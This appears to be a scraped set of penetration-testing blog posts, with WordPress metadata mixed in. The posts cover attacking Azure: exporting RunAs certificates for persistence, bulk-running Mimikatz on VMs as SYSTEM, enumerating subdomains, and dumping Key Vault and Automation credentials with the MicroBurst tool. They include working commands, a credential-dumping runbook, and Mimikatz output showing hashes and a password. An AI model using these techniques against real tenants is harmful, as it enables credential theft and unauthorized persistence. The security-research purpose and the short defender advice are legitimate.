    3. Complete these actions with both the RunAs and Stored Credential accounts
  3. Output all of the keys that you can access
    1. There may be duplicate results at the end due to key access overlap
This PowerShell function is available under the MicroBurst repository. You can find MicroBurst here - https://github.com/NetSPI/MicroBurst

Example

Here's a sample run of the function in my test domain:
Get-AzureKeyVaults-Automation -ExportCerts Y -Subscription "SUBSCRIPTION_NAME" -Verbose | ft -AutoSize

Conclusions

For the Attackers - You may have a situation where you need to access Key Vaults with a lesser privileged user. Hopefully the code/function presented in this blog allows you to move laterally to read the secrets in the vault. For the Defenders - If you're using Automation Accounts in your subscription, there's a good chance that you will need to configure an Automation Account with Key Vault reader rights. When doing this, make sure that you're limiting the Key Vaults that the account has access to. Additionally, be careful with who you give subscription contributor access to. If a contributor is compromised, your Automation Accounts may just give up your secrets.

Update - 12/30/2019

This issue was not initially reported to MSRC, since it's a user misconfiguration issue and not eligible for reporting per the MSRC guidelines ("Security misconfiguration of a service by a user"). However, they became aware of the blog and ended up issuing a CVE for it - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0962

(Originally published as "Using Azure Automation Accounts to Access Key Vaults", 2019-03-20.)

Get-AzurePasswords: Exporting Azure RunAs Certificates for Persistence

This post will be the first blog in a series that focuses around Azure Automation. I've recently run into a fair number of clients making use of Azure Automation Runbooks, and in many cases, the runbooks are being misconfigured. As attackers, these misconfigurations can provide us credentials, sensitive data, and some interesting points for escalation.

Here's the high-level TLDR of the scenario outlined in this blog:

  1. Gain access to an Azure AD account that has been provided runbook/Automation account permissions
  2. Create and run a runbook that gathers available RunAs certificate files
  3. Use the certificate files to maintain privileged access to an Azure environment
  4. Automate the whole process to simplify persistence options

Intro to Automation Accounts

Automation accounts are Azure's way of handling subscription process automation. Most implementations that I have been exposed to are set up to generate reports, copy over logs, or generally manage Azure resources. In general, the runbooks that I have seen are fairly basic and act as scheduled jobs to handle basic tasks. That being said, Automation runbooks can handle many different modules to allow you to administer multiple aspects of an Azure subscription.

Before we get too far, there's a couple of base terms to cover:

  • Automation Account
    • This is how Azure defines the high level organization unit for runbooks
    • Automation accounts are the container for runbooks
    • Subscription inherited (Owner/Contributor/Reader) IAM/Access control roles are applied at this level
  • Runbook
    • This is the specific code/script/workflow that you would run under an automation account
    • Typically PowerShell, Python, or a Workflow
    • These can also contain sensitive data, so looking over the code can be useful
  • Automation credential
    • These are the credentials used by the Runbook to accomplish tasks
    • Frequently set up as a privileged (contributor) account
    • There are two types of credentials
      • Traditional username/password
      • RunAs certificates

Both types of credentials (Passwords/RunAs) can typically be used to get access to subscriptions via the Azure PowerShell cmdlets.

Passwords versus Certificates

Automation Credentials are a cleartext username and password that you can call within a runbook for authentication. So if you're able to create a runbook, you can export these from the Automation account. If these are domain credentials, you should be able to use them to authenticate to the subscription.  I already covered the cleartext automation credentials in a previous post, so feel free to read up more about those there.


Surprisingly, I have found several instances where the automation credential account is set up with Global Administrator permissions for the Azure tenant, and that can lead to some interesting escalation opportunities.


The primary (and more common) option for running Runbooks is with a RunAs certificate. When creating a RunAs certificate, a RunAs account is registered as a Service Principal in Azure AD for the certificate/account. This "App" account is then added to the Contributors group for the domain. While some Azure admins may lock down the permissions for the account, we typically see these accounts as an opportunity to escalate privileges in an Azure environment.

If a "regular," lesser-privileged user has rights to create/run/modify runbooks, they inherently have Contributor-level rights for the subscription. While this is less likely, there is a chance that a user may have been granted Contributor rights on an Automation Account. Check out this post by Microsoft for a full rundown of Automation Account role-based access controls. At a high level, the subscription Owner and Contributor roles will have full access to Automation Accounts.

Regardless of the privilege escalation element, we may also want to maintain access to an Azure environment after our initial account access is removed. We can do that by exporting RunAs certificates from the Automation account. These certificates can be used later to regain access to the Azure subscription.

Exporting Certificates

You will need to start by grabbing a copy of MicroBurst from the NetSPI Github.

The script (Get-AzurePasswords) was previously released, and already had the ability to dump the cleartext passwords for Automation accounts. If that is not an option for an Automation account that you're attacking, you now have the functionality to export a PFX file for authentication.

The script will run an Automation Runbook on the subscription that exports the PFX file and writes it out to a local file. Once that is complete, you should have a ps1 file that you can use to automate the login for that RunAs account. I initially had this script pivoting the PFX files out through a Storage Account container, but found an easier way: cast the files as Base64 and export them through the job output.
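The Base64 pivot the post describes is just an encode/decode round trip: the runbook emits the encoded PFX as job output, and the caller decodes it locally. A sketch of that round trip using a fabricated stand-in file (not a real certificate), with GNU base64 assumed:

```shell
# Stand-in for the exported RunAs PFX; real bytes would come from the runbook
printf 'fake-pfx-bytes' > /tmp/runas_demo.pfx

# Inside the runbook, this string would be written to the job output stream
B64=$(base64 -w0 /tmp/runas_demo.pfx)

# On the attacker side, decode the captured job output back into a PFX
printf '%s' "$B64" | base64 -d > /tmp/runas_demo_restored.pfx
cmp -s /tmp/runas_demo.pfx /tmp/runas_demo_restored.pfx && echo "round-trip ok"
```

Since job output is plain text, this avoids needing a Storage Account container as an exfiltration hop.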

Example Command: Get-AzurePasswords -Keys N -AppServices N -Verbose


Using the Authentication

The initial need for collecting automation certificates came from a recent assessment where I was able to pull down cleartext credentials for an automation account, but multi-factor authentication got in the way of actually using the credentials. In order to maintain contributor level access on the subscription, I needed to gather Automation certificates. If the initial access account was burned, I would still have multiple contributor accounts that I could fall back on to maintain access to the Azure subscription.

It's important to make a note about permissions here. Contributor access on the subscription inherently gives you contributor rights on all of the virtual machines.

As mentioned in a previous post, Contributor rights on Virtual Machines grants you SYSTEM on Windows and root on Linux VMs. This is really handy for persistence.

When running the AuthenticateAs scripts, make sure that you are running as a local Administrator. You will need the rights to import the PFX file.

It's not very flashy, but here is a GIF that shows what the authentication process looks like.


One important note about the demo GIF:

I purposefully ran the Get-AzureRmADUser command to show that the RunAs account does not have access to read AzureAD. On the plus side, that RunAs account does have contributor rights on all of the virtual machines. So at a minimum, we can maintain access to the Azure VMs until the certificate is revoked or expires.

In most cases, you should be able to run the "AuthenticateAs" ps1 scripts as they were exported. If the automation RunAs Service Principal account (Example: USER123_V2h5IGFyZSB5b3UgcmVhZGluZyB0aGlzPw==) has been renamed (Example: User123), the "AuthenticateAs" ps1 script will most likely not work. If that is the case, you will need to grab the Application ID for the Automation account and add it to the script. You may have to search/filter a little to find it, but this ID can be found with the following AzureRM command:
Get-AzureRmADServicePrincipal | select DisplayName,ApplicationId


The script will prompt you if the account has been renamed, so keep an eye out for the warning text.

The AppIDs are also captured in the Domain_SPNs.csv (in the Resources folder) output from the Get-AzureDomainInfo function in MicroBurst.

Next Steps

Since I've been seeing a mix of standard Automation credentials and RunAs certificates lately, I wanted to have a way to export both to help maintain a persistent connection to Azure during an assessment. In the next two blogs, I'll cover how we can make use of the access to get more sensitive information from the subscription, and potentially escalate our privileges.

(Originally published as "Get-AzurePasswords: Exporting Azure RunAs Certificates for Persistence", 2019-02-27.)

Let's assume that you're on a penetration test where the Azure infrastructure is in scope (as it should be), and you have access to a domain account that happens to have "Contributor" rights on an Azure subscription. Contributor rights are typically harder to get, but we do see them frequently given out to developers, and if you're lucky, an overly friendly admin may have added the Domain Users group as contributors on a subscription. Alternatively, we can assume that we started with a lesser-privileged user and escalated up to the Contributor account. At this point, we could try to gather available credentials, dump configuration data, and attempt to further our access into other accounts (Owners/Domain Admins) in the subscription. For the purposes of this post, let's assume that we've exhausted the read-only options and we're still stuck with a somewhat privileged user that doesn't allow us to pivot to other subscriptions (or the internal domain). At this point, we may want to go after the virtual machines.

Attacking VMs

When attacking VMs, we could do some impactful testing and start pulling down snapshots of VHD files, but that's noisy, and nobody wants to download 100+ GB disk images. Since we like to tread lightly and work with the tools we have, let's try for command execution on the VMs. In this example environment, let's assume that none of the VMs are publicly exposed and you don't want to open any firewall ports to allow for RDP or other remote management protocols. Even without remote management protocols, there are a couple of different ways that we can accomplish code execution in this Azure environment. You could run commands on Azure VMs using Azure Automation, but for this post we will be focusing on the Invoke-AzureRmVMRunCommand function (part of the AzureRM module). This handy command will allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as NT AUTHORITY\SYSTEM. That's right… VM command execution as SYSTEM.

Running Individual Commands

You will want to run this command from an AzureRM session in PowerShell, that is authenticated with a Contributor account. You can authenticate to Azure with the Login-AzureRmAccount command.
Invoke-AzureRmVMRunCommand -ResourceGroupName VMResourceGroupName -VMName VMName -CommandId RunPowerShellScript -ScriptPath PathToYourScript
Let's breakdown the parameters:
  • ResourceGroupName - The Resource Group for the VM
  • VMName - The name of the VM
  • CommandId - The stored type of command to run through Azure.
    • "RunPowerShellScript" allows us to upload and run a PowerShell script, and we will just be using that CommandId for this blog.
  • ScriptPath - This is the path to your PowerShell PS1 file that you want to run
You can get both the VMName and ResourceGroupName by using the Get-AzureRmVM command. To make it easier for filtering, use this command:
PS C:> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name

ResourceGroupName    Name       
-----------------    ----       
TESTRESOURCES        Remote-Test
In this example, we've added an extra line (Invoke-Mimikatz) to the end of the Invoke-Mimikatz.ps1 file to run the function after it's been imported. Here is a sample run of the Invoke-Mimikatz.ps1 script on the VM (where no real accounts were logged in).
PS C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
Value[0]        : 
  Code          : ComponentStatus/StdOut/succeeded
  Level         : Info
  DisplayStatus : Provisioning succeeded
  Message       :   .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Feb 16 2015 22:15:28)
 .## ^ ##.  
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 15 modules * * */
 
mimikatz(powershell) # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : NetSPI-Test
Domain            : WORKGROUP
SID               : S-1-5-20         
        msv :
         [00000003] Primary
         * Username : NetSPI-Test
         * Domain   : WORKGROUP
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : NetSPI-Test
         * Domain   : WORKGROUP
         * Password : waza1234/ 
mimikatz(powershell) # exit 
Bye!   
Value[1]        : 
  Code          : ComponentStatus/StdErr/succeeded
  Level         : Info
  DisplayStatus : Provisioning succeeded
  Message       : 
Status          : Succeeded
Capacity        : 0
Count           : 0
This is handy for running your favorite PS scripts on a couple of VMs (one at a time), but what if we want to scale this to an entire subscription?

Running Multiple Commands

I've added the Invoke-AzureRmVMBulkCMD function to MicroBurst to allow for execution of scripts against multiple VMs in a subscription. With this function, we can run commands against an entire subscription, a specific Resource Group, or just a list of individual hosts. You can find MicroBurst here - https://github.com/NetSPI/MicroBurst For our demo, we'll run Mimikatz against all (5) of the VMs in my test subscription and write the output from the script to a log file.
Import-Module MicroBurst.psm1
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
Executing Mimikatz.ps1 against all (5) VMs in the TestingResources Subscription
Are you Sure You Want To Proceed: (Y/n):
VERBOSE: Running .\Mimikatz.ps1 on the Remote-EastUS2 - (10.2.10.4 : 52.179.214.3) virtual machine (1 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-EastUS2 - (10.2.10.4 : 52.179.214.3)
VERBOSE: Script Execution Completed in 99 seconds
VERBOSE: Running .\Mimikatz.ps1 on the Remote-EAsia - (10.2.9.4 : 65.52.161.96) virtual machine (2 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-EAsia - (10.2.9.4 : 65.52.161.96)
VERBOSE: Script Execution Completed in 99 seconds
VERBOSE: Running .\Mimikatz.ps1 on the Remote-JapanE - (10.2.12.4 : 13.78.40.185) virtual machine (3 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-JapanE - (10.2.12.4 : 13.78.40.185)
VERBOSE: Script Execution Completed in 69 seconds
VERBOSE: Running .\Mimikatz.ps1 on the Remote-JapanW - (10.2.13.4 : 40.74.66.153) virtual machine (4 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-JapanW - (10.2.13.4 : 40.74.66.153)
VERBOSE: Script Execution Completed in 69 seconds
VERBOSE: Running .\Mimikatz.ps1 on the Remote-France - (10.2.11.4 : 40.89.130.206) virtual machine (5 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-France - (10.2.11.4 : 40.89.130.206)
VERBOSE: Script Execution Completed in 98 seconds
The GIF above has been sped up for demo purposes, but the total time to run Mimikatz on the 5 VMs in this subscription was 7 minutes and 14 seconds. It's not ideal (see below), but it's functional. I haven't taken the time to multi-thread this yet, but if anyone would like to help, feel free to send in a pull request here.
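For anyone who does want to help parallelize the bulk runs, the shape of the change is simple: fan the per-VM executions out over a worker pool instead of looping sequentially. Here's a rough sketch of that pattern in Python (the actual tool is PowerShell; `run_on_vm` is a placeholder standing in for the real upload/execute/collect step against one VM):

```python
from concurrent.futures import ThreadPoolExecutor

def run_on_vm(vm_name):
    """Placeholder for the real per-VM work (upload script, run it, collect output)."""
    return f"{vm_name}: Succeeded"

def run_bulk(vm_names, max_workers=5):
    """Run the script against all VMs concurrently instead of one at a time.

    pool.map preserves input order, so results line up with vm_names.
    """
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        return list(pool.map(run_on_vm, vm_names))

print(run_bulk(["Remote-EastUS2", "Remote-EAsia", "Remote-JapanE"]))
```

Since each VM run took 30-99 seconds in the demo above, even a small worker pool would cut the 7-minute total down substantially.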

Other Ideas

For the purposes of this demo, we just ran Mimikatz on all of the VMs. That's nice, but it may not always be your best choice. Additional PowerShell options that you may want to consider:
  • Spawning Cobalt Strike, Empire, or Metasploit sessions
  • Searching for sensitive files
  • Running domain information gathering scripts on one VM and using the output to target other specific VMs for code execution

Performance Issues

As a friendly reminder, this was all done in a demo environment. If you choose to make use of this in the real world, keep this in mind: Not all Azure regions or VM images will respond the same way. I have found that some regions and VMs are better suited for running these commands. I have run into issues (stalling, failing to execute) with non-US Azure regions and the usage of these commands. Your mileage may vary, but for the most part, I have had luck with the US regions and standard Windows Server 2012 images. In my testing, the Invoke-Mimikatz.ps1 script would usually take around 30-60 seconds to run. Keep in mind that the script has to be uploaded to the VM for each round of execution, and some of your VMs may be underpowered.

Mitigations and Detection

For the defenders that are reading this, please be careful with your Owner and Contributor rights. If you have one takeaway from the post, let it be this - Contributor rights means SYSTEM rights on all the VMs. If you want to keep your contributors from executing these commands, create a new role for them and limit the Microsoft.Compute/virtualMachines/runCommand/action permission for your users. Additionally, if you want to detect this, keep an eye out for the "Run Command on Virtual Machine" log entries. It's easy to set up alerts for these, and unless Invoke-AzureRmVMRunCommand is an integral part of your VM management process, it should be easy to detect when someone is using this command. The following alert logic will let you know when anyone tries to use this command (success or failure). You can also extend the scope of this alert to all VMs in a subscription. As always, if you have any issues, comments, or improvements for this script, feel free to reach out via the MicroBurst GitHub page. [post_title] => Running PowerShell on Azure VMs at Scale [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => running-powershell-scripts-on-azure-vms [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:56:15 [post_modified_gmt] => 2021-06-08 21:56:15 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=9891 [menu_order] => 568 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [39] => WP_Post Object ( [ID] => 9724 [post_author] => 10 [post_date] => 2018-10-02 07:00:50 [post_date_gmt] => 2018-10-02 07:00:50 [post_content] =>

Microsoft makes use of a number of different domains/subdomains for each of their Azure services. We've previously covered some of these domains in a post about using trusted Azure domains for red team activities, but this time we're going to focus on finding existing Azure subdomains as part of the recon process. Also building off of another previous post, where we talked about enumerating Azure storage accounts and public blob files, the script included in this post will do DNS brute forcing to find existing Azure services subdomains.

So why do we want to do this? Let's say that we're doing a pen test against a company (TEST_COMPANY). As part of the recon process, we would want to see if TEST_COMPANY uses any Azure services. If we can confirm a DNS host name for TEST_COMPANY.azurewebsites.net, there's a pretty good chance that there's a TEST_COMPANY website hosted on that Azure host. We can follow a similar process to find additional public facing services for the rest of the domains listed below.

Domains / Associated Services

Here's a list of Azure-related domains that I've identified:

Domain                          Associated Service
azurewebsites.net               App Services
scm.azurewebsites.net           App Services - Management
p.azurewebsites.net             App Services
cloudapp.net                    App Services
file.core.windows.net           Storage Accounts - Files
blob.core.windows.net           Storage Accounts - Blobs
queue.core.windows.net          Storage Accounts - Queues
table.core.windows.net          Storage Accounts - Tables
redis.cache.windows.net         Databases - Redis
documents.azure.com             Databases - Cosmos DB
database.windows.net            Databases - MSSQL
vault.azure.net                 Key Vaults
onmicrosoft.com                 Microsoft Hosted Domain
mail.protection.outlook.com     Email
sharepoint.com                  SharePoint
azureedge.net                   CDN
search.windows.net              Search Appliance
azure-api.net                   API Services

Note: I tried to get all of the Azure subdomains into this script but there's a chance that I missed a few. Feel free to add an issue to the repo to let me know if I missed any important ones.

The script for doing the subdomain enumeration relies on finding DNS records for permutations on a base word. In the example below, we used test12345678 as the base word and found a few matches. If you cut the base word to "test123", you will find a significant number of matches (azuretest123, customertest123, dnstest123) with the permutations. While not every Azure service is going to contain the keywords of your client or application name, we do frequently run into services that share names with their owners.
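The permutation logic itself is simple; here's a rough Python sketch of the candidate-generation step (the actual script is PowerShell, and the short word list and three-domain list below are illustrative stand-ins for MicroBurst's fuller permutations.txt and domain table):

```python
import socket

# Hypothetical mini word list; MicroBurst ships a much fuller permutations.txt
PERMUTATIONS = ["dev", "test", "qa", "prod", "backup"]
SERVICE_DOMAINS = ["azurewebsites.net", "blob.core.windows.net", "vault.azure.net"]

def candidates(base):
    """Yield candidate hostnames: the base word plus each prepended/appended permutation."""
    words = {base} | {w + base for w in PERMUTATIONS} | {base + w for w in PERMUTATIONS}
    for word in sorted(words):
        for domain in SERVICE_DOMAINS:
            yield f"{word}.{domain}"

def resolves(hostname):
    """True if the hostname has a DNS record, i.e. the Azure service exists."""
    try:
        socket.gethostbyname(hostname)
        return True
    except socket.gaierror:
        return False

# Usage (performs real DNS lookups):
# for host in candidates("test123"):
#     if resolves(host):
#         print(host)
```

The existence check is just a DNS lookup, which is why the whole process can be done anonymously.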

Github/Code Info

The script is part of the MicroBurst GitHub repo and it makes use of the same permutations file (Misc/permutations.txt) from the blob enumeration script.

Usage Example

The usage of this tool is pretty simple.

  • Download the code from GitHub – https://github.com/NetSPI/MicroBurst
  • Load up the module
    • Import-Module .\Invoke-EnumerateAzureSubDomains.ps1
    • or load the script file into the PowerShell ISE and hit F5

Example Command:

Invoke-EnumerateAzureSubDomains -Base test12345678 -Verbose


If you’re having issues with the PowerShell execution policy, I still have it on good authority that there are at least 15 different ways that you can bypass the policy.

Practical Use Cases

The following are a couple of practical use cases for dealing with some of the subdomains that you may find.

App Services - (azure-api.net, cloudapp.net, azurewebsites.net)
As we noted in the first section, the azurewebsites.net domains can indicate existing Azure hosted websites. While most of these will be standard/existing websites, you may get lucky and run into a dev site, or a pre-production site that was not meant to be exposed to the internet. Here, you may have luck finding application security issues, or sensitive information that is not supposed to be internet facing.

It is worth noting that the scm subdomains (test12345678.scm.azurewebsites.net) are for site management, and you should not be able to access those without proper authorization. I don't think it's possible to misconfigure the scm subdomains for public access, but you never know.

Storage Accounts - (file, blob, queue, table.core.windows.net)
Take a look at this previous post and use the same keywords that you find with the subdomain enumeration to see if the discovered storage accounts have public file listings.

Email/SharePoint/Hosted Domain - (onmicrosoft.com, mail.protection.outlook.com, sharepoint.com)
This one is pretty straightforward, but if a company is using Microsoft for email filtering, SharePoint, or if they have a domain that is registered with "onmicrosoft.com", there's a strong indication that they've at least started to get a presence in Azure/Office365.

Databases (database.windows.net, documents.azure.com, redis.cache.windows.net)
Although it's unlikely, there is a chance that Azure database services are publicly exposed, and that there are default credentials on the databases that you find on Azure. Additionally, someone would need to be pretty friendly with their allowed inbound IPs to allow all IPs access to the database, but crazier things have happened.


Subdomain Takeovers
It may take a while to pay off, but enumerating existing Azure subdomains may be handy for anyone looking to do subdomain takeovers. Subdomain takeovers are usually done the other way around (finding a domain that's no longer registered/in use), but by finding the domains now, and keeping tabs on them for later, you may be able to monitor for potential subdomain takeovers. While testing this script, I found that there are already a few people out there squatting on existing subdomains (amazon.azurewebsites.net).
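Keeping tabs on discovered names can be as simple as a periodic resolution check: any previously seen subdomain that stops resolving is a potential takeover candidate. A hypothetical Python sketch of that monitoring loop (the `resolve` hook is injectable so the logic can be exercised without live DNS):

```python
import socket

def check_candidates(hostnames, resolve=None):
    """Return the hostnames that no longer resolve, i.e. possible takeover candidates.

    `resolve` can be injected for testing; by default a real DNS lookup is performed.
    """
    if resolve is None:
        def resolve(host):
            try:
                socket.gethostbyname(host)
                return True
            except socket.gaierror:
                return False
    return [h for h in hostnames if not resolve(h)]

# Example with a stubbed resolver: only "live.azurewebsites.net" still resolves,
# so the stale name comes back as a takeover candidate.
stub = lambda h: h == "live.azurewebsites.net"
print(check_candidates(["live.azurewebsites.net", "stale.azurewebsites.net"], resolve=stub))
# -> ['stale.azurewebsites.net']
```

Run something like this on a schedule against the subdomains you've catalogued and alert on any new entries in the result.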

Wrap Up

Hopefully this is useful for recon activities for Azure pen testing. Since this active method is not perfect, make sure that you're keeping an eye out for the domains listed above while you're doing more passive recon activities. Feel free to let me know in the comments (or via a pull request) if you have any additional Azure/Microsoft domains that should be added to the list.

[post_title] => Anonymously Enumerating Azure Services [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => enumerating-azure-services [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:55:39 [post_modified_gmt] => 2021-06-08 21:55:39 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=9724 [menu_order] => 572 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [40] => WP_Post Object ( [ID] => 9595 [post_author] => 10 [post_date] => 2018-08-28 07:00:18 [post_date_gmt] => 2018-08-28 07:00:18 [post_content] => During different types of assessments (web app, network, cloud), we will run into situations where we obtain domain credentials that can be used to log into Azure subscriptions. Most commonly, we will externally guess credentials for a privileged domain user, but we’ve also seen excessive permissions in web applications that use Azure AD for authentication. If we’re really lucky, we’ll have access to a user that has rights (typically Owner or Contributor) to access sensitive information in the subscription. If we have privileged access, there are three specific areas that we typically focus on for gathering credentials:
  • Key Vaults
  • App Services Configurations
  • Automation Accounts
There are other places that application/domain credentials could be hiding (See Storage Account files), but these are the first couple of spots that we want to check for credentials. In this post, we’ll go over the key areas where credentials are commonly found and the usage of a PowerShell script (a part of MicroBurst) that I put together to automate the process of gathering credentials from an Azure environment.

Key Vaults

Azure Key Vaults are Microsoft’s solution for storing sensitive data (keys, passwords/secrets, certificates) in the Azure cloud. Inherently, Key Vaults are great sources for finding credential data. If you have a user with the correct rights, you should be able to read data out of the key stores. Here’s a quick overview of setting permissions for Key Vaults - https://docs.microsoft.com/en-us/azure/key-vault/key-vault-secure-your-key-vault. For dumping Key Vault values, we’re using some standard Azure PowerShell commands:
  • Get-AzureKeyVaultKey
  • Get-AzureKeyVaultSecret
If you’re just looking at exporting one or two secrets, these commands can be run individually. But since we’re typically trying to access everything that we can in an Azure subscription, we’ve automated the process in the script. The script will export all of the secrets in cleartext, along with any certificates. You also have the option to save the certificates locally with the -ExportCerts flag. With access to the keys, secrets, and certificates, you may be able to use them to pivot through systems in the Azure subscription. Additionally, I’ve seen situations where administrators have stored Azure AD user credentials in the Key Vault.

App Services Configurations

Azure App Services are Microsoft’s option for rapid application deployment. Applications can be spun up quickly using App Services, and the configurations (passwords) are pushed to the applications via the App Services profiles. In the portal, the App Services deployment passwords are typically found in the “Publish Profile” link that can be found in the top navigation bar within the App Services section. Any user with contributor rights to the application should be able to access this profile. For dumping App Services configurations, we’re using the following AzureRM PowerShell commands:
  • Get-AzureRmWebApp
  • Get-AzureRmResource
  • Get-AzureRmWebAppPublishingProfile
Again, if this is just a one-off configuration dump, it’s easy to grab the profile from the web portal. But since we’re looking to automate this process, we use the commands above to list out the available apps and profiles for each app. Once the publishing profile is collected by the script, it is then parsed and credentials are returned in the final output table. Potential next steps include uploading a web shell to the App Services web server, or using any parsed connection strings included in the deployment to access the databases. With access to the databases, you could potentially use them as a C2 channel. Check out Scott’s post for more information on that.
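The parsing step is straightforward because a publish profile is just XML, with each publishProfile element carrying its deployment credentials as attributes. A rough Python equivalent of the credential extraction (the attribute names follow the standard .PublishSettings format, and the sample XML below is fabricated; this is a sketch, not NetSPI's implementation):

```python
import xml.etree.ElementTree as ET

def parse_publish_profile(xml_text):
    """Pull (publishMethod, userName, userPWD) tuples out of a publish profile."""
    root = ET.fromstring(xml_text)
    return [
        (p.get("publishMethod"), p.get("userName"), p.get("userPWD"))
        for p in root.iter("publishProfile")
    ]

# Minimal fabricated example of the file structure:
sample = """<publishData>
  <publishProfile publishMethod="MSDeploy" userName="$demoapp" userPWD="s3cret" />
  <publishProfile publishMethod="FTP" userName="demoapp\\$demoapp" userPWD="s3cret" />
</publishData>"""

print(parse_publish_profile(sample))
```

Connection strings, when present in the profile, can be harvested the same way and are often the more valuable find.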

Automation Accounts

Automation accounts are one of the ways that you can automate tasks on Azure subscriptions. As part of the automation process, Azure allows these accounts to run code in the Azure environment. This code can be PowerShell or Python, and it can also be very handy for pentesting activities. The automation account credential gathering process is particularly interesting, as we will have to run some PowerShell in Azure to actually get the credentials for the automation accounts. This section of the script will deploy a Runbook as a ps1 file to the Azure environment in order to get access to the credentials. Basically, the automation script is generated in the tool and includes the automation account name that we’re gathering the credentials for.
$myCredential = Get-AutomationPSCredential -Name 'ACCOUNT_NAME_HERE'
$userName = $myCredential.UserName
$password = $myCredential.GetNetworkCredential().Password
write-output "$userName"
write-output "$password"
This Microsoft page was a big help in getting this section of the script figured out. Dumping these credentials can take a minute, as the automation script needs to be spooled up and run on the Azure side. This method of grabbing Automation Account credentials is not the most OpSec safe, but the script does attempt to clean up after itself by deleting the Runbook. As long as the Runbook is successfully deleted at the end of the run, all that will be left is an entry in the Jobs page. To help with obscuring these activities, the script generates 15-character job names for each Runbook, so it’s hard to tell what was actually run. If you want, you can modify the jobName variable in the code to name it something a little more in line with the tutorial names, but the random names help prevent naming conflicts. Since the Automation Account credentials are user generated, there’s a chance that the passwords are being reused somewhere else in the environment, but your mileage may vary.

Script Usage

In order for this script to work, you will need to have the AzureRM and Azure PowerShell modules installed. Both modules have different ways to access the same things, but together, they can access everything that we need for this script.
  • Install-Module -Name AzureRM
  • Install-Module -Name Azure
The script will prompt you to install the modules if they’re not already installed, but it doesn’t hurt to get those installed before we start. *Update (3/19/20) - I’ve updated the scripts to be Az module compliant, so if you’re already using the Az modules, you can use Get-AzPasswords (versus Get-AzurePasswords) instead. The usage of this tool is pretty simple.
  1. Download the code from GitHub - https://github.com/NetSPI/MicroBurst
  2. Load up the module
    1. Import-Module .\Get-AzurePasswords.ps1
    2. or load the script file into the PowerShell ISE and hit F5
  3. Get-AzurePasswords -Verbose
    1. Either pipe to Out-GridView or to Export-CSV for easier parsing
    2. If you’re not already authenticated to the Azure console, it will prompt you to login.
    3. The script will also prompt you for the subscription you would like to use
  4. Review your creds, access other systems, take over the environment
If you’re having issues with the PowerShell execution policy, I have it on good authority that there are at least 15 different ways that you can bypass the policy. Sample Output:
  • Get-AzurePasswords -Verbose | Out-GridView
*The PowerShell output and the Out-GridView output have been redacted to protect the privacy of my test Azure subscription. Alternatively, you can pipe the output to Export-CSV to save the credentials in a CSV. If you don’t redirect the output, the credentials will just be returned as data table entries.

Conclusion

There’s a fair number of places where credentials can hide in an Azure subscription, and there’s plenty of uses for these credentials while attacking an Azure environment. Hopefully this script helps automate your process for gathering those credentials. For those that have read "Pentesting Azure Applications", you may have noticed that they call out the same credential locations in the “Other Azure Services” chapter. I actually had most of this script written prior to the book coming out, but the book really helped me figure out the Automation account credential section. If you haven’t read the book yet, and want a nice deep dive on Azure security, you can get it from no starch press - https://nostarch.com/azure [post_title] => Get-AzurePasswords: A Tool for Dumping Credentials from Azure Subscriptions [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => get-azurepasswords [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:55:19 [post_modified_gmt] => 2021-06-08 21:55:19 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=9595 [menu_order] => 581 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [41] => WP_Post Object ( [ID] => 9319 [post_author] => 10 [post_date] => 2018-07-17 07:00:28 [post_date_gmt] => 2018-07-17 07:00:28 [post_content] => In recent years, we have seen Microsoft Azure services gathering a larger market share in the cloud space. While they're not seeing quite the adoption that AWS has, we are running into more clients that are using Microsoft Azure services for their operations. If everything is configured correctly, this can be totally fine, but it's pretty rare for an environment to be perfectly secured (and that's why we do security testing). 
Given the increase in Azure usage, we wanted to dive deeper into automating our standard Azure testing tasks, including the enumeration of publicly available files. In this blog, we'll go over the different types of Azure file stores and how we can potentially enumerate and access publicly available "Blob" files.

Storage Accounts

